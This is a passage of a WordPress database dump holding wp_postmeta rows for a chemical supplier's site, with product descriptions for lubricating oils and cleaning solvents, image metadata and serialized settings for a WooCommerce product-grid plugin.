INSERT INTO `wp_postmeta` VALUES (14699, 467, '1367_default_editor', '<ul>\r\n 	<li><strong>ShieldSys Compounding Oil</strong>\r\n<ul>\r\n 	<li>Low viscosity: MS-1100MD</li>\r\n 	<li>Medium viscosity: MS-1500MD</li>\r\n 	<li>High Viscosity: MS-1700MD</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>ShieldSys Masterbatch Concentrate (12% PFPE-compound oil)</strong>\r\n<ul>\r\n 	<li>Universal Carrier- Ester-olefin based</li>\r\n 	<li>Nylon-6 Carrier</li>\r\n 	<li>Peek Carrier</li>\r\n 	<li>User-specified carrier</li>\r\n</ul>\r\n</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14700, 1371, '_wp_attached_file', '2016/08/S3.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14701, 1371, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2630;s:6:"height";i:3800;s:4:"file";s:14:"2016/08/S3.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:14:"S3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:14:"S3-554x800.jpg";s:5:"width";i:554;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:15:"S3-768x1110.jpg";s:5:"width";i:768;s:6:"height";i:1110;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:16:"S3-1107x1600.jpg";s:5:"width";i:1107;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:14:"S3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:14:"S3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:14:"S3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:14:"S3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14702, 1372, '_wp_attached_file', '2016/08/S4.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14703, 1372, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1996;s:4:"file";s:14:"2016/08/S4.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:14:"S4-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:14:"S4-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:14:"S4-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:16:"S4-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:14:"S4-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:14:"S4-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:14:"S4-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:14:"S4-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14704, 1373, '_wp_attached_file', '2016/08/S2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14705, 1373, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2560;s:6:"height";i:1920;s:4:"file";s:14:"2016/08/S2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:14:"S2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:14:"S2-800x600.jpg";s:5:"width";i:800;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:14:"S2-768x576.jpg";s:5:"width";i:768;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:16:"S2-1600x1200.jpg";s:5:"width";i:1600;s:6:"height";i:1200;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:14:"S2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:14:"S2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:14:"S2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:14:"S2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14706, 473, '1367_default_editor', '<p class="Body"><span class="C-14">SolvSys  MS-<wbr />750 / MS-<wbr />752</span></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Our most robust cleaning formulation utilizing a proprietary solvent formulation to yield our highest cleaning efficiency. This formulation comes as either aerosol (MS-<wbr />750) or non-<wbr />aerosol (MS-<wbr />752)</span></li>\r\n</ul>\r\n<p class="Body"><span class="C-14">SolvSys MS-<wbr />780 / MS-<wbr />782</span></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Specially designed for solvation and removal of fluorinated oils, this solvent has extremely low surface tension, allowing it to clean into area where conventional solvents can not reach.  This formulation comes in wither aerosol (MS-<wbr />780) or non-<wbr />aerosol (MS-<wbr />782)</span></li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14715, 1377, '_wp_attached_file', '2016/09/Protective-Coatings-e1473363125309.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14716, 1377, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:46:"2016/09/Protective-Coatings-e1473363125309.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473363125309-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473363125309-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473363125309-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473363125309-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473363125309-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473363125309-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473363125309-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14717, 1377, '_edit_lock', '1473364653:2'); 
INSERT INTO `wp_postmeta` VALUES (14718, 1377, '_wp_attachment_backup_sizes', 'a:14:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:23:"Protective-Coatings.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:30:"Protective-Coatings-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:30:"Protective-Coatings-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:30:"Protective-Coatings-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:30:"Protective-Coatings-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:30:"Protective-Coatings-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:30:"Protective-Coatings-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:18:"full-1473363125309";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:38:"Protective-Coatings-e1473362729804.jpg";}s:23:"thumbnail-1473363125309";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473362729804-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:20:"medium-1473363125309";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473362729804-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:26:"medium_large-1473363125309";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473362729804-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:28:"shop_thumbnail-1473363125309";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473362729804-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:26:"shop_catalog-1473363125309";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473362729804-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:25:"shop_single-1473363125309";a:4:{s:4:"file";s:45:"Protective-Coatings-e1473362729804-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (14719, 1377, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14728, 1381, '_edit_lock', '1473370098:1'); 
INSERT INTO `wp_postmeta` VALUES (14729, 1381, '_edit_last', '1'); 
INSERT INTO `wp_postmeta` VALUES (14730, 1381, 'gsc_woo_mb_main', 'a:20:{s:8:"per_page";s:2:"10";s:17:"gsc_woo_g_c_style";s:12:"gsc_woo_grid";s:9:"items_gap";s:2:"10";s:10:"woo_gutter";s:2:"10";s:16:"gsc_woo_grid_gap";s:6:"normal";s:18:"gsc_woo_grid_group";a:1:{i:0;a:7:{s:24:"gsc_woo_grid_desktop_big";s:1:"4";s:20:"gsc_woo_grid_desktop";s:1:"4";s:19:"gsc_woo_grid_tablet";s:1:"3";s:22:"gsc_woo_grid_phone_big";s:1:"2";s:18:"gsc_woo_grid_phone";s:1:"1";s:10:"pagination";s:3:"yes";s:18:"grid_pagi_settings";a:1:{i:0;a:12:{s:17:"grid_pagi_preview";s:1037:"     <style>\r\n\r\n		.twi-pagination li a,.twi-pagination li.twi-active span{\r\n\r\n			border-radius: 10%;\r\n\r\n			padding: 6px;\r\n\r\n			width: 20px;\r\n\r\n            height: 20px;\r\n\r\n		}\r\n\r\n		.twi-pagination li a{\r\n\r\n			border: 2px solid #000;\r\n\r\n		}\r\n\r\n		.twi-pagination li a:hover,.twi-pagination li.twi-active span{\r\n\r\n			border: 2px solid #00a8e6;\r\n\r\n		}\r\n\r\n		.twi-pagination li a{\r\n\r\n			color: #000;\r\n\r\n			background: #fff;\r\n\r\n		}\r\n\r\n		.twi-pagination li.twi-active span,.twi-pagination li a:hover{\r\n\r\n			background: #00a8e6;\r\n\r\n			color: #fff;\r\n\r\n		}\r\n\r\n     </style>\r\n\r\n     <ul class="twi-pagination twi-pagination-center">\r\n\r\n	    <li><a href="#" class="prev page-numbers"><i class="twi-icon-chevron-left"></i></a></li>\r\n\r\n        <li><a href="#" class="page-numbers">1</a></li>\r\n\r\n        <li class="twi-active"><span class="page-numbers current">2</span></li>\r\n\r\n        <li><a href="#" class="page-numbers">3</a></li>\r\n\r\n        <li><a href="#" class="next page-numbers"><i class="twi-icon-chevron-right"></i></a></li>\r\n\r\n    </ul>\r\n\r\n	";s:13:"grid_pagi_pos";s:6:"center";s:5:"text1";s:4:"#000";s:3:"bg1";s:4:"#fff";s:8:"bor_col1";s:4:"#000";s:10:"bor_width1";s:1:"2";s:5:"text2";s:4:"#fff";s:3:"bg2";s:7:"#00a8e6";s:8:"bor_col2";s:7:"#00a8e6";s:10:"bor_width2";s:1:"2";s:7:"bor_rad";s:2:"10";s:3:"pad";s:1:"6";}}}}s:18:"gsc_carousel_group";a:1:{i:0;a:12:{s:13:"large_desktop";s:1:"4";s:7:"desktop";s:1:"4";s:6:"tablet";s:1:"3";s:9:"phone_big";s:1:"2";s:5:"phone";s:1:"1";s:8:"autoplay";s:4:"true";s:12:"autoplaytime";s:1:"5";s:9:"car_hover";s:5:"false";s:7:"car_nav";s:4:"true";s:13:"car_nav_group";a:1:{i:0;a:10:{s:17:"grid_pagi_preview";s:686:"     <style>\r\n\r\n        .owl-prev,.owl-next {\r\n\r\n		    background: #fff;\r\n\r\n		    border: 2px solid #000!important;\r\n\r\n		    color: #000;\r\n\r\n		    border-radius: 10%;\r\n\r\n		}\r\n\r\n		.owl-prev:hover,.owl-next:hover {\r\n\r\n		    background: #fff;\r\n\r\n		    border: 2px solid #000!important;\r\n\r\n		    color: #000;\r\n\r\n		}\r\n\r\n     </style>\r\n\r\n     <div class="owl-theme">\r\n\r\n	     <div class="owl-controls">\r\n\r\n	     	<div class="owl-nav">\r\n\r\n	     		<div class="owl-prev">\r\n\r\n	     			<i class="twi-icon-chevron-left"></i>\r\n\r\n	     		</div>\r\n\r\n	     		<div class="owl-next">\r\n\r\n	     			<i class="twi-icon-chevron-right"></i>\r\n\r\n	     		</div>\r\n\r\n	     	</div>\r\n\r\n	     </div>\r\n\r\n     </div>\r\n\r\n	";s:6:"nav_bg";s:4:"#fff";s:7:"nav_txt";s:4:"#000";s:10:"nav_border";s:4:"#000";s:11:"nav_bor_wid";s:1:"2";s:11:"nav_bor_rad";s:2:"10";s:8:"nav_bg_h";s:4:"#fff";s:9:"nav_txt_h";s:4:"#000";s:12:"nav_border_h";s:4:"#000";s:7:"nav_pos";s:7:"nav_b_c";}}s:8:"car_page";s:5:"false";s:14:"car_page_group";a:1:{i:0;a:7:{s:18:"pagination_preview";s:714:"     <style>\r\n\r\n		.owl-theme .owl-dots .owl-dot span{\r\n\r\n		    background: #fff;\r\n\r\n		    border: 2px solid #000;\r\n\r\n		    border-radius: 50%;\r\n\r\n		}\r\n\r\n		.owl-theme .owl-dots .owl-dot span:hover,.owl-theme .owl-dots .owl-dot.active span{\r\n\r\n			background: #000000;\r\n\r\n			border: 2px solid #000000;\r\n\r\n		}\r\n\r\n     </style>\r\n\r\n     <div class="owl-theme">\r\n\r\n	     <div class="owl-controls">\r\n\r\n	     	<div class="owl-dots">\r\n\r\n	     		<div class="owl-dot">\r\n\r\n	     			<span></span>\r\n\r\n	     		</div>\r\n\r\n	     		<div class="owl-dot active">\r\n\r\n	     			<span></span>\r\n\r\n	     		</div>\r\n\r\n	     		<div class="owl-dot">\r\n\r\n	     			<span></span>\r\n\r\n	     		</div>\r\n\r\n	     	</div>\r\n\r\n	     </div>\r\n\r\n     </div>\r\n\r\n	";s:7:"pagi_bg";s:4:"#fff";s:11:"pagi_border";s:4:"#000";s:12:"pagi_bor_wid";s:1:"2";s:12:"pagi_bor_rad";s:2:"50";s:9:"pagi_bg_h";s:7:"#000000";s:13:"pagi_border_h";s:7:"#000000";}}}}s:15:"gsc_pro_orderby";s:5:"title";s:13:"gsc_pro_order";s:4:"desc";s:5:"title";s:7:"display";s:9:"price_h_s";s:4:"none";s:4:"cart";s:4:"none";s:6:"rating";s:4:"none";s:18:"forced_full_screen";s:2:"no";s:16:"gsc_woo_rib_main";a:1:{i:0;a:2:{s:11:"gsc_rib_dis";s:3:"yes";s:14:"gsc_fe_lab_pos";s:5:"right";}}s:14:"gsc_temp_style";s:6:"normal";s:17:"nor_preview_group";a:1:{i:0;a:17:{s:19:"normal_live_preview";s:4616:"	<link href=\'\' rel=\'stylesheet\' type=\'text/css\'>\r\n\r\n     <style>\r\n\r\n		.nor .twi-panel{\r\n\r\n			color: !important;\r\n\r\n			background: !important; \r\n\r\n			border:px solid !important;\r\n\r\n			border-radius: px!important;\r\n\r\n		}\r\n\r\n       .nor .gsc_pro_title a,.nor .twi-panel,.nor .gsc_cart a{\r\n\r\n			font-family: !important;\r\n\r\n			font-style: !important;\r\n\r\n			font-weight: !important;\r\n\r\n		}\r\n\r\n		.nor .gsc_pro_title a{\r\n\r\n			text-transform: !important;\r\n\r\n			color: !important;\r\n\r\n			font-size: px!important;\r\n\r\n		}\r\n\r\n		.nor .gsc_pro_title a:hover{\r\n\r\n            color: !important;\r\n\r\n		}\r\n\r\n		.nor .twi-price{\r\n\r\n			font-size: px!important;\r\n\r\n		}\r\n\r\n		.nor .twi-rating{\r\n\r\n            color: !important;\r\n\r\n            font-size: #FFFpx!important;\r\n\r\n		}\r\n\r\n		.nor .gsc_cart a {\r\n\r\n		    border: #000px solid #000!important;\r\n\r\n		    color: !important;\r\n\r\n		    text-transform: 2!important;\r\n\r\n		    background: #fff!important;\r\n\r\n		    border-radius: inheritpx!important; \r\n\r\n		    font-size: 0px!important;\r\n\r\n		}\r\n\r\n		.nor .gsc_cart a:hover {\r\n\r\n		    border: #000px solid #000!important;\r\n\r\n		    color: #000!important;\r\n\r\n		    background: #fff!important;\r\n\r\n		}\r\n\r\n		.nor .twi-sale{\r\n\r\n		  background-color: 14 !important;\r\n\r\n		  border-color: 14 !important;\r\n\r\n		  color: #00C4BC !important;\r\n\r\n		}\r\n\r\n		.nor .twi-out{\r\n\r\n		  background-color: #FFF !important;\r\n\r\n		  border-color: #FFF !important;\r\n\r\n		  color: #DC6868 !important;\r\n\r\n		}\r\n\r\n		.nor .twi-fea{\r\n\r\n		  background-color: #FFF !important;\r\n\r\n		  border-color: #FFF !important;\r\n\r\n		  color: #00C4BC !important;\r\n\r\n		}\r\n\r\n		.nor .twi-fea,.nor .twi-sale {\r\n\r\n		    border-bottom-right-radius: px!important;\r\n\r\n		    border-top-left-radius: px!important;\r\n\r\n		}\r\n\r\n		.nor .twi-out {\r\n\r\n		    border-top-right-radius: px!important;\r\n\r\n		    border-bottom-left-radius: px!important;\r\n\r\n		}\r\n\r\n		.nor .twi-panel-teaser img{\r\n\r\n			border-top-right-radius: px!important;\r\n\r\n			border-top-left-radius: px!important;\r\n\r\n		}\r\n\r\n     </style>\r\n\r\n     <div class="nor">\r\n\r\n	     <div class="twi-panel twi-panel-box twi-text-">\r\n\r\n				<a class="twi-ui top left attached label teal twi-sale">Sale!</a>\r\n\r\n				<a class="twi-ui top right attached label red twi-out">Out of stock</a>\r\n\r\n				<a class="twi-ui bottom right attached label teal twi-fea">Featured</a>		    \r\n\r\n				<div class="twi-panel-teaser twi-rib">\r\n\r\n				   <a href="#"><img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce//images/demo.jpg"></a>\r\n\r\n			    </div>\r\n\r\n			    <div class="twi-details">\r\n\r\n				    <h3 class="gsc_pro_title">\r\n\r\n					    <a href="#">Product 1</a>\r\n\r\n				     </h3>\r\n\r\n				     <div class="twi-price">\r\n\r\n				     	<del><span class="amount">$120.00</span></del> \r\n\r\n				     	<ins><span class="amount">$100.00</span></ins>\r\n\r\n				     </div>\r\n\r\n				     <div class="twi-rating">\r\n\r\n				     	<i class="twi-icon-star"></i>\r\n\r\n				     	<i class="twi-icon-star"></i>\r\n\r\n				     	<i class="twi-icon-star"></i>\r\n\r\n				     	<i class="twi-icon-star-half-o"></i>\r\n\r\n				     	<i class="twi-icon-star-o"></i>\r\n\r\n			        </div>\r\n\r\n			        <div class="gsc_cart twi-own-">\r\n\r\n				     	<a href="#">Add to cart</a>\r\n\r\n				    </div>\r\n\r\n			</div>\r\n\r\n		</div>\r\n\r\n	</div>\r\n\r\n	<hr />\r\n\r\n	<h1>Upgrade</h1>\r\n\r\n	<table width="100%">\r\n\r\n	<tr>\r\n\r\n	<td width="50%"><p style="font-size:1.5em" class="p-upgade"><strong>Upgrade Today</strong> to the <span class="span-green"><strong>Premium Grid, Slider and Carousel for Woocommerce Plugin</strong></span> and <strong>Immediately</strong> get access to the <strong>All Premium Features Below</strong> for only <span class="span-green">$19</strong>.</p></td>\r\n\r\n	<td width="50%">\r\n\r\n		<div style="max-width:250px;width:100%;height:auto;margin:0px auto">\r\n\r\n			<a href="https://www.repupress.com/register/premium-grid-slider-carousel-woocommerce-plugin/" target="_blank"><img src="https://www.repupress.com/wp-content/uploads/upgrade.png"></a>\r\n\r\n		</div>\r\n\r\n	</td>\r\n\r\n	</tr>\r\n\r\n	</table>\r\n\r\n	<br /><br />\r\n\r\n	<img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce/assets/grid-options-pf.png">\r\n\r\n	<br /><br />\r\n\r\n	<img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce/assets/product-title-pf.png">\r\n\r\n	<br /><br />\r\n\r\n	<img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce/assets/product-price-pf.png">\r\n\r\n	<br /><br />\r\n\r\n	<img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce/assets/product-star-pf.png">\r\n\r\n	";s:8:"cart_col";s:4:"#000";s:14:"cart_txt_trans";s:7:"inherit";s:7:"cart_bg";s:4:"#fff";s:12:"cart_fo_size";s:2:"14";s:12:"cart_bor_wid";s:1:"2";s:8:"cart_bor";s:4:"#000";s:14:"cart_col_hover";s:4:"#fff";s:13:"cart_bg_hover";s:4:"#000";s:14:"cart_bor_hover";s:4:"#000";s:12:"cart_bor_rad";s:1:"0";s:7:"sale_bg";s:7:"#00C4BC";s:8:"sale_txt";s:4:"#FFF";s:6:"out_bg";s:7:"#DC6868";s:7:"out_txt";s:4:"#FFF";s:5:"fe_bg";s:7:"#00C4BC";s:6:"fe_txt";s:4:"#FFF";}}s:17:"img_preview_group";a:1:{i:0;a:11:{s:16:"img_live_preview";s:1825:"	<link href=\'https://fonts.googleapis.com/css?family=Roboto:{{first}}{{first}}&subset=latin\' rel=\'stylesheet\' type=\'text/css\'>\r\n\r\n     <style>\r\n\r\n		.gsc_ho .twi-panel{\r\n\r\n			color: !important; \r\n\r\n			border:0px solid #eee!important;\r\n\r\n			font-family: Roboto!important;\r\n\r\n			font-style: {{first}}!important;\r\n\r\n			font-weight: {{first}}!important;\r\n\r\n			border-radius: 0px!important;\r\n\r\n		}\r\n\r\n		.gsc_ho .twi-sale{\r\n\r\n		  background-color: #00C4BC !important;\r\n\r\n		  border-color: #00C4BC !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.gsc_ho .twi-out{\r\n\r\n		  background-color: #DC6868 !important;\r\n\r\n		  border-color: #DC6868 !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.gsc_ho .twi-fea{\r\n\r\n		  background-color: #00C4BC !important;\r\n\r\n		  border-color: #00C4BC !important;\r\n\r\n		  color: #FFF !important;\r\n\r\n		}\r\n\r\n		.gsc_ho .twi-fea,.gsc_ho .twi-sale {\r\n\r\n		    border-bottom-right-radius: 0px!important;\r\n\r\n		    border-top-left-radius: 0px!important;\r\n\r\n		}\r\n\r\n		.gsc_ho .twi-out {\r\n\r\n		    border-top-right-radius: 0px!important;\r\n\r\n		    border-bottom-left-radius: 0px!important;\r\n\r\n		}\r\n\r\n		.gsc_ho .twi-panel-teaser img{\r\n\r\n			border-top-right-radius: 0px!important;\r\n\r\n			border-top-left-radius: 0px!important;\r\n\r\n		}\r\n\r\n     </style>\r\n\r\n     <div class="gsc_ho">\r\n\r\n	     <div class="twi-panel twi-panel-box gsc_img_only">\r\n\r\n				<a class="twi-ui top left attached label teal twi-sale">Sale!</a>\r\n\r\n				<a class="twi-ui top right attached label red twi-out">Out of stock</a>\r\n\r\n				<a class="twi-ui bottom right attached label teal twi-fea">Featured</a>		    \r\n\r\n				<div class="twi-panel-teaser twi-rib">\r\n\r\n				   <a href="#"><img src="https://www.miller-stephenson.com/wp-content/plugins/grid-slider-carousel-for-woocommerce/images/demo.jpg"></a>\r\n\r\n			    </div>\r\n\r\n		</div>\r\n\r\n	</div>\r\n\r\n	";s:4:"font";s:6:"Roboto";s:10:"nor_border";s:1:"0";s:11:"nor_bor_col";s:4:"#eee";s:16:"nor_border_width";s:1:"0";s:7:"sale_bg";s:7:"#00C4BC";s:8:"sale_txt";s:4:"#FFF";s:6:"out_bg";s:7:"#DC6868";s:7:"out_txt";s:4:"#FFF";s:5:"fe_bg";s:7:"#00C4BC";s:6:"fe_txt";s:4:"#FFF";}}s:19:"hover_preview_group";a:1:{i:0;a:36:{s:18:"hover_live_preview";s:4890:"	<link href=\'https://fonts.googleapis.com/css?family=Roboto:{{first}}{{first}}&subset=latin\' rel=\'stylesheet\' type=\'text/css\'>\r\n\r\n     <style>\r\n\r\n		.admin_hover_wrap .pic-twi-caption{\r\n\r\n			background: rgba(44, 62, 80, 0.5) !important;\r\n\r\n			color: #fff !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .pic-twi{\r\n\r\n			border: 0px solid #eee;\r\n\r\n			border-radius: 0%;\r\n\r\n		}\r\n\r\n       .admin_hover_wrap .gsc_pro_title a,.admin_hover_wrap .twi-panel,.gsc_cart a,.admin_hover_wrap .twi-price,.admin_hover_wrap .twi-sale,.admin_hover_wrap .twi-fea,.admin_hover_wrap .twi-out{\r\n\r\n			font-family: Roboto !important;\r\n\r\n			font-style: {{first}} !important;\r\n\r\n			font-weight: {{first}} !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .gsc_pro_title a{\r\n\r\n			text-transform: inherit !important;\r\n\r\n			color: #fff !important;\r\n\r\n			font-size: 16px !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .gsc_pro_title a:hover{\r\n\r\n            color: #000 !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-price{\r\n\r\n			font-size: 12px !important;\r\n\r\n			color: #fff !important;\r\n\r\n		}\r\n\r\n		.admin_hover_wrap .twi-rating{\r\n\r\n            color: #fff !important;\r\n\r\n            font-size: 12px 